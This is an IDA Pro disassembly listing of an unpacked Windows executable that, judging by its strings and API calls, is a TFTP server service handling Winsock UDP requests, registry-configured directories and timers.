;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 6DFC90FF94CBBDC09C843F760E1F99C0
; File Name : u:\work\6dfc90ff94cbbdc09c843f760e1f99c0_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 1000000
; Section 1. (virtual address 00001000)
; Virtual size : 00006000 ( 24576.)
; Section size in file : 00006000 ( 24576.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
seg000 segment para public 'CODE' use32
assume cs:seg000
;org 1001000h
assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
dword_1001000 dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExAdword_1001004 dd 77E37D39h ; resolved to->ADVAPI32.StartServiceCtrlDispatcherAdword_1001008 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_100100C dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKeydword_1001010 dd 77DF0953h ; resolved to->ADVAPI32.RegisterServiceCtrlHandlerAdword_1001014 dd 77DEB193h ; resolved to->ADVAPI32.SetServiceStatus ; sub_1001DEB+6B�r ...
dd 0
dword_100101C dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcessdword_1001020 dd 7C8329D9h ; resolved to->KERNEL32.ExpandEnvironmentStringsAdword_1001024 dd 7C80A7D4h ; resolved to->KERNEL32.GetLocalTimedword_1001028 dd 7C91188Ah ; resolved to->NTDLL.RtlDeleteCriticalSectiondword_100102C dd 7C910340h ; resolved to->NTDLL.RtlSetLastWin32Error ; sub_1002F31+1C3�r ...
dword_1001030 dd 7C80A017h ; resolved to->KERNEL32.SetEventdword_1001034 dd 7C8328F7h ; resolved to->KERNEL32.ResumeThreaddword_1001038 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Error ; sub_1001665:loc_1001762�r ...
dword_100103C dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObject ; sub_1001A91+1AB�r
dword_1001040 dd 7C8308ADh ; resolved to->KERNEL32.CreateEventA ; sub_10018DB+B4�r ...
dword_1001044 dd 7C809EF1h ; resolved to->KERNEL32.InitializeCriticalSection ; sub_10019F0+14�r ...
dword_1001048 dd 7C812BB6h ; resolved to->KERNEL32.HeapCreatedword_100104C dd 7C9010EDh ; resolved to->NTDLL.RtlLeaveCriticalSection ; sub_1001A91+B5�r ...
dword_1001050 dd 7C91043Dh ; resolved to->NTDLL.RtlFreeHeapdword_1001054 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_1001E73+9E�r ...
dword_1001058 dd 7C901005h ; resolved to->NTDLL.RtlEnterCriticalSection ; sub_1001A91+4E�r ...
dword_100105C dd 7C809766h, 7C80A05Dh, 7C9105D4h, 7C80A03Bh; resolved to->KERNEL32.InterlockedIncrement ; sub_1001A91+2C1�r ...
dword_100106C dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_100205A+4E�r
dword_1001070 dd 7C90112Bh ; resolved to->NTDLL.RtlTryEnterCriticalSectiondword_1001074 dd 7C839732h ; resolved to->KERNEL32.SuspendThread dd 0
dword_100107C dd 77C39D67h ; resolved to->MSVCRT._inittermdword_1001080 dd 77C1EEEBh ; resolved to->MSVCRT.__getmainargsdword_1001084 dd 77C4D675h ; resolved to->MSVCRT.__setusermatherrdword_1001088 dd 77C2EFB0h ; resolved to->MSVCRT._lseekdword_100108C dd 77C2D0D7h ; resolved to->MSVCRT._closedword_1001090 dd 77C2FAA3h ; resolved to->MSVCRT._readdword_1001094 dd 77C2C407h ; resolved to->MSVCRT.malloc ; sub_100205A+93�r ...
dword_1001098 dd 77C2C437h ; resolved to->MSVCRT.reallocdword_100109C dd 77C40AB1h ; resolved to->MSVCRT.fclosedword_10010A0 dd 77C2C21Bh ; resolved to->MSVCRT.free ; sub_1001F54+47�r ...
dword_10010A4 dd 77C4AEA3h ; resolved to->MSVCRT.time ; sub_1001DEB+8�r
dword_10010A8 dd 77C1F3A5h ; resolved to->MSVCRT._chdirdword_10010AC dd 77C1F2BCh ; resolved to->MSVCRT._errno ; sub_10027E1+77�r ...
; ---------------------------------------------------------------------------
loc_10010B0: ; DATA XREF: sub_1001665+1AE�r
daa
clc
sal dword ptr [edi+10h], 0F0h ; DATA XREF: sub_1001665+1DB�r
retn
; ---------------------------------------------------------------------------
db 77h
dword_10010B8 dd 77C4A9F1h ; resolved to->MSVCRT.ctime ; sub_1001DEB+19�r
dword_10010BC dd 77C4EE2Fh ; resolved to->MSVCRT._controlfp; ---------------------------------------------------------------------------
loc_10010C0: ; DATA XREF: seg000:loc_1003BF0�r
xchg eax, esp
pop esp
retn
; ---------------------------------------------------------------------------
db 77h
dword_10010C4 dd 77C3537Ch ; resolved to->MSVCRT.__set_app_typedword_10010C8 dd 77C1F1DBh ; resolved to->MSVCRT.__p__fmodedword_10010CC dd 77C1F1A4h ; resolved to->MSVCRT.__p__commodedword_10010D0 dd 77C623D8h ; resolved to->MSVCRT._adjust_fdivdword_10010D4 dd 77C4186Ah ; resolved to->MSVCRT.printfdword_10010D8 dd 77C1F1F1h ; resolved to->MSVCRT.__p___initenv; ---------------------------------------------------------------------------
loc_10010DC: ; DATA XREF: sub_1003BA0�r
scasb
sub eax, 9E9A77C3h ; DATA XREF: seg000:01003B7A�r
retn
; ---------------------------------------------------------------------------
db 77h
dword_10010E4 dd 77C2F566h ; resolved to->MSVCRT._open ; sub_100333A+1B9�r
dword_10010E8 dd 77C30303h ; resolved to->MSVCRT._writedword_10010EC dd 77C39E7Eh ; resolved to->MSVCRT.exit ; sub_1001665+C0�r ...
dd 0
dword_10010F4 dd 71AB8769h ; resolved to->WS2_32.WSASocketAdword_10010F8 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastError ; sub_1001A91+12B�r ...
dword_10010FC dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_1001100 dd 71AB4573h ; resolved to->WS2_32.WSAEventSelectdword_1001104 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_100230A+F�r ...
dword_1001108 dd 71AC0D03h ; resolved to->WS2_32.WSAGetOverlappedResultdword_100110C dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_1002A3D+40�r ...
dword_1001110 dd 71ABF652h, 71AB4519h; resolved to->WS2_32.WSARecvFrom ; sub_1001A91+2A�r
dword_1001118 dd 71AB4682h ; resolved to->WS2_32.WSACloseEventdword_100111C dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_100205A+E7�r ...
dword_1001120 dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_1002F31+64�r ...
dword_1001124 dd 71AB3E00h ; resolved to->WS2_32.bind ; sub_1002F31+256�r ...
dword_1001128 dd 71ABE6EBh ; resolved to->WS2_32.getservbynamedword_100112C dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_100333A+1EB�r
dword_1001130 dd 71AB2C69h ; resolved to->WS2_32.sendto ; sub_1002A3D+65�r ...
align 8
dword_1001138 dd 76D66300h ; resolved to->IPHLPAPI.NotifyAddrChangedword_100113C dd 76D63B9Ch ; resolved to->IPHLPAPI.GetIpAddrTable dd 0
dword_1001144 dd 7C90253Ah ; resolved to->NTDLL.memmovedword_1001148 dd 7C902C80h ; resolved to->NTDLL.strncpydword_100114C dd 7C96FB58h ; resolved to->NTDLL.isupperdword_1001150 dd 7C970328h ; resolved to->NTDLL.tolower ; sub_100333A+95�r
dword_1001154 dd 7C9383CDh ; resolved to->NTDLL.RtlUpdateTimer ; sub_1002B5E+114�r ...
dword_1001158 dd 7C92D707h ; resolved to->NTDLL.RtlDeleteTimer ; sub_1002A3D+FD�r ...
dword_100115C dd 7C913374h ; resolved to->NTDLL._stricmpdword_1001160 dd 7C924C29h ; resolved to->NTDLL.atoi ; sub_10023D8+F2�r
dword_1001164 dd 7C92F23Ah ; resolved to->NTDLL._itoadword_1001168 dd 7C92D97Bh ; resolved to->NTDLL.RtlDeregisterWaitEx ; sub_1002901+35�r
dword_100116C dd 7C901A09h ; resolved to->NTDLL._chkstkdword_1001170 dd 7C92EBF8h ; resolved to->NTDLL.RtlCreateTimerQueuedword_1001174 dd 7C9359F3h ; resolved to->NTDLL.RtlRegisterWait ; sub_10018DB+D6�r
dword_1001178 dd 7C92DFACh ; resolved to->NTDLL.RtlCreateTimer ; sub_1002F31+34D�r ...
dd 9 dup(0)
dd 37ECADD7h, 0
dd 3, 310h, 0
dd 4D10h, 0
dd 37ECADD7h, 0
dd 6, 2 dup(0)
dd 5020h, 0
dd 37ECADD7h, 0
dd 2, 1Ah, 0
db 90h
db 0FEh, 0A7h, 0FFh
aDNtPrivateNetS db 'D:\nt\private\net\sockets\tcpsvcs\tftpd\tftpd.c built Sep 24 1999'
db ' 22:17:18',0Ah,0
aOWritableFiles db ' o writable files keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+C4�o
aWritable db 'writable',0 ; DATA XREF: sub_1001570+BF�o
; sub_10037BF+121�o
align 4
aOReadableFiles db ' o Readable files keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+B6�o
aReadable db 'readable',0 ; DATA XREF: sub_1001570+B1�o
; sub_10037BF+F1�o
align 4
aOValidmastersK db ' o ValidMasters keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+A8�o
aMasters db 'masters',0 ; DATA XREF: sub_1001570+A3�o
; sub_10037BF+C1�o
aOValidclientsK db ' o ValidClients keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+9A�o
aClients db 'clients',0 ; DATA XREF: sub_1001570+95�o
; sub_10037BF+8E�o
aTheseKeysAreSh db 'These keys are shell patterns with * and ? (see examples above):',0Ah
; DATA XREF: sub_1001570+8D�o
db 0
align 4
aOStartdirector db ' o StartDirectory keyname "%s"',0Ah,0 ; DATA XREF: sub_1001570+84�o
aDirectory db 'directory',0 ; DATA XREF: sub_1001570+7F�o
; sub_10037BF+5C�o
align 4
aRegistryKeyNam db 'Registry key names, all strings: HKEY_LOCAL_MACHINE %s',0Ah,0
; DATA XREF: sub_1001570+76�o
aSystemCurrentc db 'System\CurrentControlSet\Services\tftpd\parameters',0
; DATA XREF: sub_1001570+71�o
; sub_10037BF+13�o
align 10h
aTftpd_logfileI db ' TFTPD_LOGFILE is %s',0Ah ; DATA XREF: sub_1001570+68�o
db 0Ah,0
align 4
aTftpd_log db 'tftpd.log',0 ; DATA XREF: sub_1001570+63�o
; sub_1001665+1D6�o
align 4
aTftpd_default_ db ' TFTPD_DEFAULT_DIR is %s',0Ah,0 ; DATA XREF: sub_1001570+5A�o
align 4
aTftpdroot db '\tftpdroot\',0 ; DATA XREF: sub_1001570+55�o
; sub_1003910+1E�o
a? db '-?',0 ; DATA XREF: sub_1001570+10�o
align 4
aA db 'a+',0 ; DATA XREF: sub_1001665+1D1�o
align 4
aTftp db 'tftp',0 ; DATA XREF: sub_100205A+31�o
align 10h
aUdp db 'udp',0 ; DATA XREF: sub_100205A+2C�o
aOptionNegotiat db 'Option negotiation failure',0 ; DATA XREF: seg000:01005CE0�o
align 10h
aNoSuchUser db 'No such user',0 ; DATA XREF: seg000:01005CDC�o
align 10h
aFileAlreadyExi db 'File already exists',0 ; DATA XREF: seg000:01005CD8�o
aUnknownTransfe db 'Unknown transfer ID',0 ; DATA XREF: seg000:01005CD4�o
aIllegalTftpOpe db 'Illegal TFTP operation',0 ; DATA XREF: seg000:01005CD0�o
align 10h
aDiskFullOrAllo db 'Disk full or allocation exceeded',0 ; DATA XREF: seg000:01005CCC�o
align 4
aAccessViolatio db 'Access violation',0 ; DATA XREF: seg000:01005CC8�o
align 4
aFileNotFound db 'File not found',0 ; DATA XREF: seg000:01005CC4�o
align 4
aErrorUndefined db 'Error undefined',0 ; DATA XREF: seg000:off_1005CC0�o
aTsize db 'tsize',0 ; DATA XREF: sub_10023D8:loc_100251A�o
align 10h
aTimeout_0 db 'timeout',0 ; DATA XREF: sub_10023D8:loc_1002498�o
aBlksize db 'blksize',0 ; DATA XREF: sub_10023D8+4E�o
aTimeout db 'Timeout',0 ; DATA XREF: sub_1002A3D+D2�o
aInsufficientRe db 'Insufficient resources',0 ; DATA XREF: sub_1002F31:loc_1003197�o
; sub_100333A+201�o ...
align 10h
aFileNameTooLon db 'File name too long',0 ; DATA XREF: sub_1002F31+195�o
; sub_100333A+1A0�o
align 4
aMalformedFileN db 'Malformed file name',0 ; DATA XREF: sub_1002F31+139�o
; sub_100333A+159�o
aOctet db 'octet',0 ; DATA XREF: sub_1002F31+D2�o
; sub_100333A:loc_100341F�o
align 10h
aNetascii db 'netascii',0 ; DATA XREF: sub_1002F31+9F�o
; sub_100333A:loc_10033E1�o
align 4
asc_100155C: ; DATA XREF: sub_1003910+7F�o
unicode 0, <\>,0
dword_1001560 dd 0FFFFFFFFh, 1003B5Eh, 1003B73h, 0
; =============== S U B R O U T I N E =======================================
sub_1001570 proc near ; CODE XREF: seg000:01003B4A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 1
push esi
jle loc_1001646
mov eax, [esp+4+arg_4]
mov esi, offset a? ; "-?"
mov eax, [eax+4]
loc_1001588: ; CODE XREF: sub_1001570+34�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_10015AA
test cl, cl
jz short loc_10015A6
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_10015AA
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_1001588
loc_10015A6: ; CODE XREF: sub_1001570+22�j
xor eax, eax
jmp short loc_10015AF
; ---------------------------------------------------------------------------
loc_10015AA: ; CODE XREF: sub_1001570+1E�j
; sub_1001570+2C�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_10015AF: ; CODE XREF: sub_1001570+38�j
test eax, eax
jnz loc_1001646
mov esi, dword_10010D4
push offset asc_1005010 ; " ======================================"...
call esi ; dword_10010D4
pop ecx
push offset aTftpdroot ; "\\tftpdroot\\"
push offset aTftpd_default_ ; " TFTPD_DEFAULT_DIR is %s\n"
call esi ; dword_10010D4
pop ecx
pop ecx
push offset aTftpd_log ; "tftpd.log"
push offset aTftpd_logfileI ; " TFTPD_LOGFILE is %s\n\n"
call esi ; dword_10010D4
pop ecx
pop ecx
push offset aSystemCurrentc ; "System\\CurrentControlSet\\Services\\tftpd"...
push offset aRegistryKeyNam ; "Registry key names, all strings: HKEY_L"...
call esi ; dword_10010D4
pop ecx
pop ecx
push offset aDirectory ; "directory"
push offset aOStartdirector ; " o StartDirectory keyname \"%s\"\n"
call esi ; dword_10010D4
pop ecx
pop ecx
push offset aTheseKeysAreSh ; "These keys are shell patterns with * an"...
call esi ; dword_10010D4
pop ecx
push offset aClients ; "clients"
push offset aOValidclientsK ; " o ValidClients keyname \"%s\"\n"
call esi ; dword_10010D4
pop ecx
pop ecx
push offset aMasters ; "masters"
push offset aOValidmastersK ; " o ValidMasters keyname \"%s\"\n"
call esi ; dword_10010D4
pop ecx
pop ecx
push offset aReadable ; "readable"
push offset aOReadableFiles ; " o Readable files keyname \"%s\"\n"
call esi ; dword_10010D4
pop ecx
pop ecx
push offset aWritable ; "writable"
push offset aOWritableFiles ; " o writable files keyname \"%s\"\n"
call esi ; dword_10010D4
pop ecx
pop ecx
push 0FFFFFFFFh
call dword_10010EC ; exit
pop ecx
loc_1001646: ; CODE XREF: sub_1001570+6�j
; sub_1001570+41�j
push offset off_1005CB0
call dword_1001004 ; StartServiceCtrlDispatcherA
test eax, eax
jnz short loc_100165B
call dword_1001038 ; RtlGetLastWin32Error
loc_100165B: ; CODE XREF: sub_1001570+E3�j
push 0
call dword_100101C ; ExitProcess
pop esi
retn
sub_1001570 endp
; =============== S U B R O U T I N E =======================================
sub_1001665 proc near ; DATA XREF: seg000:01005CB4�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push ebp
push esi
push edi
xor ebp, ebp
push offset sub_1001DEB
push offset aTftpd ; "Tftpd"
mov dword_1006120, 30h
mov dword_1006124, 2
mov dword_1006128, ebp
mov dword_1006134, 1
mov dword_1006138, 4E20h
mov dword_100612C, ebp
mov dword_1006130, ebp
call dword_1001010 ; RegisterServiceCtrlHandlerA
cmp eax, ebp
mov dword_1006044, eax
jz loc_1001762
mov esi, dword_1001014
mov edi, offset dword_1006120
push edi
push eax
call esi ; dword_1001014
cmp eax, ebp
jz loc_1001762
mov ebx, dword_1001040
push ebp
push ebp
push ebp
push ebp
call ebx ; dword_1001040
push ebp
push ebp
push ebp
push ebp
mov dword_1005DDC, eax
call ebx ; dword_1001040
cmp dword_1005DDC, ebp
mov dword_1005DE0, eax
jz short loc_100171C
cmp eax, ebp
jz short loc_100171C
push offset dword_1006140
push 101h
call dword_10010FC ; WSAStartup
cmp eax, 0FFFFFFFFh
jnz short loc_1001735
call dword_10010F8 ; WSAGetLastError
loc_100171C: ; CODE XREF: sub_1001665+96�j
; sub_1001665+9A�j ...
push 1Fh
call sub_1001E73
push 1
call dword_10010EC ; exit
pop ecx
loc_100172C: ; CODE XREF: sub_1001665+218�j
; sub_1001665+224�j
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
retn 8
; ---------------------------------------------------------------------------
loc_1001735: ; CODE XREF: sub_1001665+AF�j
push edi
mov dword_1006124, 4
push dword_1006044
mov dword_1006128, 7
mov dword_1006134, ebp
mov dword_1006138, ebp
call esi ; dword_1001014
cmp eax, ebp
jnz short loc_100176A
loc_1001762: ; CODE XREF: sub_1001665+57�j
; sub_1001665+6E�j
call dword_1001038 ; RtlGetLastWin32Error
jmp short loc_100171C
; ---------------------------------------------------------------------------
loc_100176A: ; CODE XREF: sub_1001665+FB�j
push 9
pop ecx
xor eax, eax
mov edx, offset dword_10060C0
mov edi, edx
rep stosd
push edx
call dword_10010A4 ; time
pop ecx
mov edx, [esp+10h+arg_0]
dec edx
mov ebx, (offset dword_1005E07+1)
jz short loc_10017F3
mov eax, [esp+10h+arg_4]
lea eax, [eax+edx*4]
mov [esp+10h+arg_0], eax
loc_1001797: ; CODE XREF: sub_1001665+18C�j
mov eax, [esp+10h+arg_0]
mov eax, [eax]
cmp byte ptr [eax], 2Dh
jnz short loc_10017F3
movsx ecx, byte ptr [eax+1]
sub ecx, 64h
jz short loc_10017C9
dec ecx
jz short loc_10017BD
dec ecx
jnz short loc_10017E9
mov dword_1005DD8, 1
jmp short loc_10017E9
; ---------------------------------------------------------------------------
loc_10017BD: ; CODE XREF: sub_1001665+147�j
mov dword_1005DD4, 1
jmp short loc_10017E9
; ---------------------------------------------------------------------------
loc_10017C9: ; CODE XREF: sub_1001665+144�j
lea edi, [eax+2]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov eax, ecx
mov esi, edi
mov edi, ebx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
loc_10017E9: ; CODE XREF: sub_1001665+14A�j
; sub_1001665+156�j ...
sub [esp+10h+arg_0], 4
dec edx
cmp edx, ebp
ja short loc_1001797
loc_10017F3: ; CODE XREF: sub_1001665+125�j
; sub_1001665+13B�j
call sub_10037BF
call sub_1003910
mov esi, dword_10010A8
push ebx
call esi ; dword_10010A8
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_100182E
call dword_10010AC ; _errno
push ebx
call dword ptr loc_10010B0
cmp eax, ebp
pop ecx
jnz loc_100171C
push ebx
call esi ; dword_10010A8
cmp eax, ebp
pop ecx
jnz loc_100171C
loc_100182E: ; CODE XREF: sub_1001665+1A5�j
cmp dword_1005DD8, ebp
jz short loc_1001857
push offset aA ; "a+"
push offset aTftpd_log ; "tftpd.log"
call dword ptr loc_10010B2+2
pop ecx
cmp eax, ebp
pop ecx
mov dword_1005DD0, eax
jnz short loc_1001857
mov dword_1005DD8, ebp
loc_1001857: ; CODE XREF: sub_1001665+1CF�j
; sub_1001665+1EA�j
push offset dword_10060C0
call dword_10010B8 ; ctime
pop ecx
call sub_10018DB
call sub_10019F0
push 0FFFFFFFFh
push dword_1005DDC
call dword_100103C ; WaitForSingleObject
cmp eax, ebp
jz loc_100172C
call dword_1001038 ; RtlGetLastWin32Error
jmp loc_100172C
sub_1001665 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100188E proc near ; CODE XREF: sub_100205A+D5�p
; sub_1002F31+2A8�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ecx
push 3
push [ebp+arg_4]
push [ebp+arg_0]
call dword_1001100 ; WSAEventSelect
test eax, eax
jz short loc_10018AE
call dword_1001038 ; RtlGetLastWin32Error
xor eax, eax
jmp short locret_10018D7
; ---------------------------------------------------------------------------
loc_10018AE: ; CODE XREF: sub_100188E+14�j
test [ebp+arg_8], 1
push 0
push 0FFFFFFFFh
push [ebp+arg_0]
jz short loc_10018C2
push offset loc_1001D74
jmp short loc_10018C7
; ---------------------------------------------------------------------------
loc_10018C2: ; CODE XREF: sub_100188E+2B�j
push offset loc_1001DDB
loc_10018C7: ; CODE XREF: sub_100188E+32�j
push [ebp+arg_4]
lea eax, [ebp+var_4]
push eax
call dword_1001174 ; RtlRegisterWait
mov eax, [ebp+var_4]
locret_10018D7: ; CODE XREF: sub_100188E+1E�j
leave
retn 0Ch
sub_100188E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10018DB proc near ; CODE XREF: sub_1001665+1FE�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, dword_1001044
push edi
push offset dword_1006080
call esi ; dword_1001044
push offset dword_1006020
call esi ; dword_1001044
mov eax, offset dword_1006098
mov dword_100609C, eax
mov dword_1006098, eax
mov eax, offset dword_1006038
mov dword_100603C, eax
mov dword_1006038, eax
lea eax, [ebp+var_4]
push eax
call sub_1001FA6
xor esi, esi
test eax, eax
jnz short loc_1001957
mov eax, [ebp+var_4]
xor ebx, ebx
cmp [eax], esi
jbe short loc_100194F
xor edi, edi
loc_100192E: ; CODE XREF: sub_10018DB+72�j
mov ecx, [eax+edi+4]
cmp ecx, esi
jz short loc_1001947
cmp ecx, 100007Fh
jz short loc_1001947
push ecx
call sub_100205A
mov eax, [ebp+var_4]
loc_1001947: ; CODE XREF: sub_10018DB+59�j
; sub_10018DB+61�j
inc ebx
add edi, 18h
cmp ebx, [eax]
jb short loc_100192E
loc_100194F: ; CODE XREF: sub_10018DB+4F�j
push eax
call dword_10010A0 ; free
pop ecx
loc_1001957: ; CODE XREF: sub_10018DB+46�j
push offset dword_10060A0
call dword_1001170 ; RtlCreateTimerQueue
cmp eax, esi
jnz loc_10019EB
mov eax, 0EA60h
push esi
push eax
push eax
push esi
push offset sub_10029BA
push offset dword_1006048
push dword_10060A0
call dword_1001178 ; RtlCreateTimer
push esi
push esi
push esi
push esi
mov edi, eax
call dword_1001040 ; CreateEventA
cmp eax, esi
mov dword_1005DF8, eax
jnz short loc_10019A2
mov eax, edi
jmp short loc_10019EB
; ---------------------------------------------------------------------------
loc_10019A2: ; CODE XREF: sub_10018DB+C1�j
push esi
push 0FFFFFFFFh
push esi
push offset sub_1002219
push eax
push offset dword_1005DFC
call dword_1001174 ; RtlRegisterWait
cmp eax, esi
jnz short loc_10019EB
mov ecx, offset dword_1006100
xor eax, eax
mov edi, ecx
push ecx
stosd
stosd
stosd
stosd
stosd
mov eax, dword_1005DF8
push offset dword_1005E00
mov dword_1006110, eax
call sub_1003A44 ; NotifyAddrChange
cmp eax, esi
jz short loc_10019E9
cmp eax, 3E5h
jnz short loc_10019EB
loc_10019E9: ; CODE XREF: sub_10018DB+105�j
xor eax, eax
loc_10019EB: ; CODE XREF: sub_10018DB+89�j
; sub_10018DB+C5�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_10018DB endp
; =============== S U B R O U T I N E =======================================
sub_10019F0 proc near ; CODE XREF: sub_1001665+203�p
mov eax, offset dword_1006078
push offset dword_1006060
mov dword_100607C, eax
mov dword_1006078, eax
call dword_1001044 ; InitializeCriticalSection
push 0
push 0EFD1Ch
push 0
call dword_1001048 ; HeapCreate
mov dword_1005DEC, eax
retn
sub_10019F0 endp
; =============== S U B R O U T I N E =======================================
sub_1001A1F proc near ; CODE XREF: sub_10029BA+79�p
push ebx
push esi
mov ebx, offset dword_1006060
push edi
push ebx
xor esi, esi
call dword_1001058 ; RtlEnterCriticalSection
mov eax, dword_1005DF0
sub eax, dword_1005DF4
cmp eax, 0Ah
jbe short loc_1001A46
shr eax, 1
mov esi, eax
jmp short loc_1001A4E
; ---------------------------------------------------------------------------
loc_1001A46: ; CODE XREF: sub_1001A1F+1F�j
cmp eax, 3
jbe short loc_1001A4E
push 2
pop esi
loc_1001A4E: ; CODE XREF: sub_1001A1F+25�j
; sub_1001A1F+2A�j
test esi, esi
jbe short loc_1001A86
mov edi, esi
loc_1001A54: ; CODE XREF: sub_1001A1F+65�j
mov eax, dword_1006078
mov esi, eax
mov ecx, [eax]
mov eax, [eax+4]
mov [eax], ecx
mov [ecx+4], eax
push dword ptr [esi+30h]
call dword_1001054 ; CloseHandle
push esi
push 0
push dword_1005DEC
call dword_1001050 ; RtlFreeHeap
dec dword_1005DF0
dec edi
jnz short loc_1001A54
loc_1001A86: ; CODE XREF: sub_1001A1F+31�j
push ebx
call dword_100104C ; RtlLeaveCriticalSection
pop edi
pop esi
pop ebx
retn
sub_1001A1F endp
; =============== S U B R O U T I N E =======================================
sub_1001A91 proc near ; CODE XREF: seg000:01001DCC�p
; seg000:01001DE1�p
var_68 = byte ptr -68h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_30 = byte ptr -30h
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = byte ptr -10h
var_8 = dword ptr -8
arg_0 = dword ptr 4
arg_10 = byte ptr 14h
arg_FF9C = dword ptr 0FFA0h
arg_FFA0 = dword ptr 0FFA4h
arg_FFA4 = dword ptr 0FFA8h
arg_FFA8 = dword ptr 0FFACh
arg_FFD4 = dword ptr 0FFD8h
arg_FFD8 = dword ptr 0FFDCh
arg_10004 = dword ptr 10008h
mov eax, 10004h
call sub_1003A3E ; _chkstk
push ebx
push ebp
xor ebp, ebp
push esi
push edi
mov [esp+10h], ebp
mov ebx, offset dword_1006060
loc_1001AAA: ; CODE XREF: sub_1001A91+291�j
lea eax, [esp+10h+arg_0]
push eax
push 4004667Fh
push [esp+18h+arg_10004]
call dword_1001110+4
cmp eax, ebp
jnz loc_1001D27
cmp [esp+1Ch+var_8], ebp
jz loc_1001D65
xor eax, eax
lea edi, [esp+1Ch+arg_10]
stosd
stosd
stosd
stosd
push ebx
stosd
call dword_1001058 ; RtlEnterCriticalSection
mov eax, dword_1006078
inc dword_1005DF4
cmp eax, offset dword_1006078
jz short loc_1001B11
mov ecx, [eax]
mov esi, eax
mov eax, [eax+4]
mov [eax], ecx
mov [ecx+4], eax
push dword ptr [esi+30h]
call dword_100105C+0Ch
mov eax, [esi+30h]
jmp short loc_1001B41
; ---------------------------------------------------------------------------
loc_1001B11: ; CODE XREF: sub_1001A91+64�j
inc dword_1005DF0
push 2FF6Ch
push 8
push dword_1005DEC
call dword_100105C+8
mov esi, eax
cmp esi, ebp
jz loc_1001D5E
push ebp
push ebp
push ebp
push ebp
call dword_1001040 ; CreateEventA
mov [esi+30h], eax
loc_1001B41: ; CODE XREF: sub_1001A91+7E�j
push ebx
mov [esp+40h+arg_0], eax
call dword_100104C ; RtlLeaveCriticalSection
lea ebp, [esi+34h]
mov ecx, 3FEFh
xor eax, eax
mov edi, ebp
rep stosd
stosb
mov eax, [esp+40h+arg_FFD8]
mov [esp+40h+var_1C], ebp
mov [esp+40h+var_20], 0FFBDh
mov [esp+40h+var_28], 10h
mov [esi+1Ch], eax
lea eax, [esp+40h+var_10]
push 0
push eax
lea eax, [esp+48h+var_28]
lea edi, [esi+2Ch]
push eax
lea eax, [esi+0Ch]
push eax
lea eax, [esp+50h+var_30]
push eax
push edi
lea eax, [esp+58h+var_20]
push 1
push eax
push [esp+60h+arg_FFD4]
call dword_1001110 ; WSARecvFrom
mov [esp+64h+var_48], eax
mov ax, [esi+0Eh]
push eax
call dword_100110C ; ntohs
cmp [esp+68h+var_4C], 0
jz short loc_1001C34
call dword_10010F8 ; WSAGetLastError
cmp eax, 3E5h
jnz loc_1001D2F
mov eax, dword_1005DDC
push 0FFFFFFFFh
mov [esp+6Ch+var_40], eax
mov eax, [esp+6Ch+var_28]
mov [esp+6Ch+var_3C], eax
lea eax, [esp+6Ch+var_40]
push 0
push eax
push 2
call dword_100105C+4
cmp eax, 0FFFFFFFFh
jz loc_1001D2F
cmp eax, 102h
jz loc_1001D2F
test eax, eax
jz loc_1001D2F
lea eax, [esp+78h+var_68]
push eax
push 0
lea eax, [esp+80h+var_48]
push edi
push eax
push [esp+88h+arg_FF9C]
call dword_1001108 ; WSAGetOverlappedResult
test eax, eax
jnz short loc_1001C34
